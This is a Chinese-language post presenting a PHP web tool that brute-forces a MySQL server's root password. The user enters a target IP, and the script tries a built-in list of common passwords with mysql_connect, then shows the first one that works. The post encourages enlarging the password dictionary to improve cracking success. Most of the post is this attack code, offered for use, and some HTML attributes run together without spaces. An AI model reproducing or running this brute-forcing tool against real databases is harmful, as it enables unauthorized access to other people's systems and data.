PHP版Mysql爆破小脚本
MysqlPHP版本爆破小脚本
(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。)
/* *author:Bearcat2016-10-5 */ <html> <head> <title>Mysql账号密码爆破工具</title> <metahttp-equiv="Content-Type"content="text/html;charset=utf-8"> </head> <body> <center> <br><br> <h1>MysqlDatabaseBlasting(Mysql账号密码在线爆破工具V1.0)</h1> <br> <?php if(@$_POST['submit']){ $host=@$_POST['host']; if($host!=""){ $username="root";//用户名字典 $password=array('','123456','admin','root','ccf304vn');//密码字典 echo"<hr><br>--------------------爆破状态--------------------<br>"; echo"密码错误次数:"; for($i=0;$i<=count($password);$i++){ if(@mysql_connect($host,$username,$password[$i])){ echo"<br><br><fontcolor='red'>爆破成功--密码-->".@$password[$i]."</font>"; break; }else{ echo$i."、"; continue; } } echo"<br>--------------------爆破结束--------------------<br><hr>"; }else{ echo"<script>alert('黑客,输入数据库IP地址')</script>"; } } ?> <br><br><br><br> <formaction="MysqlDatabaseBlasting.php"method="post"> 数据库IP地址:<inputtype="text"name="host"/> <inputtype="submit"value="爆破"name="submit"/> </form> <center> </body> </html>